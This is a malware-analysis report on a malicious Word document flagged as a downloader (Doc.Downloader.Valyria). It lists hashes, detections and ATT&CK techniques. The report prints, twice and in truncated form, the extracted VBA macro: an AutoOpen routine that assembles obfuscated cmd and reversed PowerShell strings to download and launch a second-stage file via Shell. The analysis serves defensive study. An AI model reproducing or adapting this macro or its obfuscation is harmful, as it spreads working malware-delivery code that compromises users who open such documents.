Office (OLE) malware analysis — malicious · e45478ec68218459

MALICIOUS

Office (OLE)

82.6 KB Created: 2018-09-21 07:36:00 Authoring application: Microsoft Office Word First seen: 2018-11-13

MD5: 624374a71aff9444ae96e241a8f76ffb SHA-1: 45c40f3309080533b160928b6c671672954ea466 SHA-256: e45478ec682184591757a389b394eb2e389a5dfaa52df166ec7980915b4251a2

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro is designed to execute a payload using the Shell function, as indicated by the ClamAV detection name 'Doc.Downloader.Valyria-6826483-0'. The macro's obfuscated nature and use of the Shell function strongly suggest it's a downloader for a second-stage payload.

Heuristics 5

ClamAV: Doc.Downloader.Valyria-6826483-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6826483-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9665 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9665 bytes
SHA-256: `d66f161018d4ae78f1e876d2e8c04a14d7a9160c0a55cf94531a5fdfba6e8bdb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wOmURnchjRVUXF" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim kQoFz() ReDim kQoFz(5) kQoFz(0) = Mid(kWIvdc, 506, 856) kQoFz(1) = "COSw" kQoFz(2) = Mid(fuUDiwIQ, 130, 82) kQoFz(3) = Right(UbRhnNrL, 403) kQoFz(4) = MidB(JjRooA, 805, 478) Dim OjGZq() ReDim OjGZq(2) OjGZq(0) = MidB(kbBJUQEI, 162, 25) OjGZq(1) = "LZp" Dim iziiHC() ReDim iziiHC(2) iziiHC(0) = Left(DjtVlD, 809) iziiHC(1) = "dBjUjQUi" Dim diVKD() ReDim diVKD(3) diVKD(0) = "pzSrm" diVKD(1) = Mid(ZoUsr, 825, 549) diVKD(2) = Left(JLwtfI, 613) Dim Rmbiuj() ReDim Rmbiuj(2) Rmbiuj(0) = "G" Rmbiuj(1) = MidB(sIZRlwpK, 954, 137) Dim VTQiZ() ReDim VTQiZ(5) VTQiZ(0) = Left(HbKQR, 442) VTQiZ(1) = MidB(lmbBw, 728, 672) VTQiZ(2) = MidB(BjUcRijb, 178, 714) VTQiZ(3) = MidB(cqwSL, 10, 416) VTQiZ(4) = Right(vidcqC, 152) VfMMZlaPM (KeyString(2 + 10 + 6 + 10 + 39) + WqNqFZXvhI + YvAaWKRfHU + JzVvJTjvB + XABfLuToTQB) Dim nSYHi() ReDim nSYHi(3) nSYHi(0) = Mid(JiZNAmk, 630, 638) nSYHi(1) = "iQwOvYic" nSYHi(2) = Mid(iHoLqzIW, 138, 155) Dim cRbztz() ReDim cRbztz(4) cRbztz(0) = MidB(BsbNmMlA, 46, 288) cRbztz(1) = Mid(PowJzS, 407, 451) cRbztz(2) = "PrQdYqjGwX" cRbztz(3) = Right(BaqaED, 877) End Sub Function VfMMZlaPM(qSiGQApBCSb As String) Dim zFHos() ReDim zFHos(2) zFHos(0) = Right(zSSIc, 433) zFHos(1) = "XJcz" Dim jiBfwR() ReDim jiBfwR(4) jiBfwR(0) = "zVFvZSZdSmIp" jiBfwR(1) = "njnjOniMT" jiBfwR(2) = Left(bFEGSa, 922) jiBfwR(3) = Left(IWDFiNW, 678) Shell@ qSiGQApBCSb, CInt(msoBarTypeNormal) Dim EXTIII() ReDim EXTIII(3) EXTIII(0) = Right(rVQLmcdD, 573) EXTIII(1) = MidB(UMHCWLAS, 550, 656) EXTIII(2) = Mid(aJfdh, 518, 291) Dim zvzSj() ReDim zvzSj(5) zvzSj(0) = "Kwjabajh" zvzSj(1) = Right(zqiiLT, 810) zvzSj(2) = MidB(awRMkiF, 38, 280) zvzSj(3) = Mid(WsYPo, 374, 916) zvzSj(4) = Left(EiBGc, 821) Dim woduYZ() ReDim woduYZ(5) woduYZ(0) = "lCBriGMOPfpfEj" woduYZ(1) = Mid(jNFjZCBa, 166, 939) woduYZ(2) = "sDafnCIlXpQJCU" woduYZ(3) = "qNNVwiuJ" woduYZ(4) = Left(Qoozz, 697) Dim jqsji() ReDim jqsji(5) jqsji(0) = Mid(HPWVSOZO, 574, 476) jqsji(1) = Right(QNpphC, 284) jqsji(2) = MidB(KPHiUUa, 695, 379) jqsji(3) = MidB(PJhbh, 713, 177) jqsji(4) = MidB(SBhbpEdt, 224, 569) End Function Attribute VB_Name = "uhNJoksmWSIzT" Function WqNqFZXvhI() Dim lKMtZU() ReDim lKMtZU(4) lKMtZU(0) = Mid(KsTicI, 40, 982) lKMtZU(1) = Left(lkBOdu, 136) lKMtZU(2) = Right(IcZLjoWY, 357) lKMtZU(3) = "EUUKUidCEVLdb" Dim hbhzXN() ReDim hbhzXN(3) hbhzXN(0) = MidB(KTkjNfaA, 596, 261) hbhzXN(1) = Mid(mjZawZ, 505, 302) hbhzXN(2) = "tddFzJlbBSQbz" Dim KwAsP() ReDim KwAsP(2) KwAsP(0) = Left(qDPkz, 894) KwAsP(1) = "iDz" Dim sdwqiA() ReDim sdwqiA(4) sdwqiA(0) = MidB(prvmPM, 137, 592) sdwqiA(1) = "YHT" sdwqiA(2) = MidB(jqihEtzz, 241, 934) sdwqiA(3) = Right(pGkhTbkl, 884) LRzjmH = "md /" + "V^:^O" + "/C" + ChrW(2 + 5 + 4 + 5 + 18) + "^s^e^t ^9" + "^O^3" + "N= ^ ^ ^ " + "^ ^ ^ ^ ^ " + "^ ^ " + "^ ^ ^ ^}}{^" + "hct^ac}^;" + "^" + "ka^e" + "r^b;" + "l^O" Dim wPnwjL() ReDim wPnwjL(4) wPnwjL(0) = Left(zbWWqkK, 621) wPnwjL(1) = Right(CztGn, 339) wPnwjL(2) = Left(upPjj, 405) wPnwjL(3) = MidB(QjSCVo, 26, 350) Dim ziwaQ() ReDim ziwaQ(5) ziwaQ(0) = Right(lbqmlf, 17) ziwaQ(1) = "rVqVjCiOREZWk" ziwaQ(2) = Left(XBXFTL, 656) ziwaQ(3) = Left(NXjWijAR, 572) ziwaQ(4) = Left(wATIN, 530) Dim LNalw() ReDim LNalw(2) LNalw(0) = Left(YOSCzdaT, 925) LNalw(1) = Left(OtGRcui, 270) Dim hiNrB() ReDim hiNrB(3) hiNrB(0) = Right(mTDpOfMp, 236) hiNrB(1) = "H" hiNrB(2) = Mid(lJYwNA, 518, 390) lzAXJ = "^" + "d$^ " + "^metI^-ek^ov" + "nI" + ";)l^Od$^" + " ^,L^sc^$(^" + "e^l^iF^da^o" + "^lnwo^D^.^Sm" + "^P" + "^${y" + "r" + "t^{)v^s^b^$^" + " n^i^" Dim iosJk() ReDim iosJk(3) iosJk(0) = Left(svarPwuq, ... (truncated)

SHA-256: d66f161018d4ae78f1e876d2e8c04a14d7a9160c0a55cf94531a5fdfba6e8bdb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wOmURnchjRVUXF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim kQoFz()
ReDim kQoFz(5)
kQoFz(0) = Mid(kWIvdc, 506, 856)
kQoFz(1) = "COSw"
kQoFz(2) = Mid(fuUDiwIQ, 130, 82)
kQoFz(3) = Right(UbRhnNrL, 403)
kQoFz(4) = MidB(JjRooA, 805, 478)

   Dim OjGZq()
ReDim OjGZq(2)
OjGZq(0) = MidB(kbBJUQEI, 162, 25)
OjGZq(1) = "LZp"

   Dim iziiHC()
ReDim iziiHC(2)
iziiHC(0) = Left(DjtVlD, 809)
iziiHC(1) = "dBjUjQUi"

   Dim diVKD()
ReDim diVKD(3)
diVKD(0) = "pzSrm"
diVKD(1) = Mid(ZoUsr, 825, 549)
diVKD(2) = Left(JLwtfI, 613)

   Dim Rmbiuj()
ReDim Rmbiuj(2)
Rmbiuj(0) = "G"
Rmbiuj(1) = MidB(sIZRlwpK, 954, 137)

   Dim VTQiZ()
ReDim VTQiZ(5)
VTQiZ(0) = Left(HbKQR, 442)
VTQiZ(1) = MidB(lmbBw, 728, 672)
VTQiZ(2) = MidB(BjUcRijb, 178, 714)
VTQiZ(3) = MidB(cqwSL, 10, 416)
VTQiZ(4) = Right(vidcqC, 152)

VfMMZlaPM (KeyString(2 + 10 + 6 + 10 + 39) + WqNqFZXvhI + YvAaWKRfHU + JzVvJTjvB + XABfLuToTQB)
   Dim nSYHi()
ReDim nSYHi(3)
nSYHi(0) = Mid(JiZNAmk, 630, 638)
nSYHi(1) = "iQwOvYic"
nSYHi(2) = Mid(iHoLqzIW, 138, 155)

   Dim cRbztz()
ReDim cRbztz(4)
cRbztz(0) = MidB(BsbNmMlA, 46, 288)
cRbztz(1) = Mid(PowJzS, 407, 451)
cRbztz(2) = "PrQdYqjGwX"
cRbztz(3) = Right(BaqaED, 877)

End Sub
Function VfMMZlaPM(qSiGQApBCSb As String)
   Dim zFHos()
ReDim zFHos(2)
zFHos(0) = Right(zSSIc, 433)
zFHos(1) = "XJcz"

   Dim jiBfwR()
ReDim jiBfwR(4)
jiBfwR(0) = "zVFvZSZdSmIp"
jiBfwR(1) = "njnjOniMT"
jiBfwR(2) = Left(bFEGSa, 922)
jiBfwR(3) = Left(IWDFiNW, 678)

Shell@ qSiGQApBCSb, CInt(msoBarTypeNormal)
   Dim EXTIII()
ReDim EXTIII(3)
EXTIII(0) = Right(rVQLmcdD, 573)
EXTIII(1) = MidB(UMHCWLAS, 550, 656)
EXTIII(2) = Mid(aJfdh, 518, 291)

   Dim zvzSj()
ReDim zvzSj(5)
zvzSj(0) = "Kwjabajh"
zvzSj(1) = Right(zqiiLT, 810)
zvzSj(2) = MidB(awRMkiF, 38, 280)
zvzSj(3) = Mid(WsYPo, 374, 916)
zvzSj(4) = Left(EiBGc, 821)

   Dim woduYZ()
ReDim woduYZ(5)
woduYZ(0) = "lCBriGMOPfpfEj"
woduYZ(1) = Mid(jNFjZCBa, 166, 939)
woduYZ(2) = "sDafnCIlXpQJCU"
woduYZ(3) = "qNNVwiuJ"
woduYZ(4) = Left(Qoozz, 697)

   Dim jqsji()
ReDim jqsji(5)
jqsji(0) = Mid(HPWVSOZO, 574, 476)
jqsji(1) = Right(QNpphC, 284)
jqsji(2) = MidB(KPHiUUa, 695, 379)
jqsji(3) = MidB(PJhbh, 713, 177)
jqsji(4) = MidB(SBhbpEdt, 224, 569)

End Function

Attribute VB_Name = "uhNJoksmWSIzT"
Function WqNqFZXvhI()
Dim lKMtZU()
ReDim lKMtZU(4)
lKMtZU(0) = Mid(KsTicI, 40, 982)
lKMtZU(1) = Left(lkBOdu, 136)
lKMtZU(2) = Right(IcZLjoWY, 357)
lKMtZU(3) = "EUUKUidCEVLdb"

   Dim hbhzXN()
ReDim hbhzXN(3)
hbhzXN(0) = MidB(KTkjNfaA, 596, 261)
hbhzXN(1) = Mid(mjZawZ, 505, 302)
hbhzXN(2) = "tddFzJlbBSQbz"

   Dim KwAsP()
ReDim KwAsP(2)
KwAsP(0) = Left(qDPkz, 894)
KwAsP(1) = "iDz"

   Dim sdwqiA()
ReDim sdwqiA(4)
sdwqiA(0) = MidB(prvmPM, 137, 592)
sdwqiA(1) = "YHT"
sdwqiA(2) = MidB(jqihEtzz, 241, 934)
sdwqiA(3) = Right(pGkhTbkl, 884)

LRzjmH = "md /" + "V^:^O" + "/C" + ChrW(2 + 5 + 4 + 5 + 18) + "^s^e^t ^9" + "^O^3" + "N=  ^   ^ ^ " + "^ ^ ^ ^ ^ " + "^ ^ " + "^ ^ ^ ^}}{^" + "hct^ac}^;" + "^" + "ka^e" + "r^b;" + "l^O"
Dim wPnwjL()
ReDim wPnwjL(4)
wPnwjL(0) = Left(zbWWqkK, 621)
wPnwjL(1) = Right(CztGn, 339)
wPnwjL(2) = Left(upPjj, 405)
wPnwjL(3) = MidB(QjSCVo, 26, 350)

   Dim ziwaQ()
ReDim ziwaQ(5)
ziwaQ(0) = Right(lbqmlf, 17)
ziwaQ(1) = "rVqVjCiOREZWk"
ziwaQ(2) = Left(XBXFTL, 656)
ziwaQ(3) = Left(NXjWijAR, 572)
ziwaQ(4) = Left(wATIN, 530)

   Dim LNalw()
ReDim LNalw(2)
LNalw(0) = Left(YOSCzdaT, 925)
LNalw(1) = Left(OtGRcui, 270)

   Dim hiNrB()
ReDim hiNrB(3)
hiNrB(0) = Right(mTDpOfMp, 236)
hiNrB(1) = "H"
hiNrB(2) = Mid(lJYwNA, 518, 390)

lzAXJ = "^" + "d$^ " + "^metI^-ek^ov" + "nI" + ";)l^Od$^" + " ^,L^sc^$(^" + "e^l^iF^da^o" + "^lnwo^D^.^Sm" + "^P" + "^${y" + "r" + "t^{)v^s^b^$^" + " n^i^"
Dim iosJk()
ReDim iosJk(3)
iosJk(0) = Left(svarPwuq,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.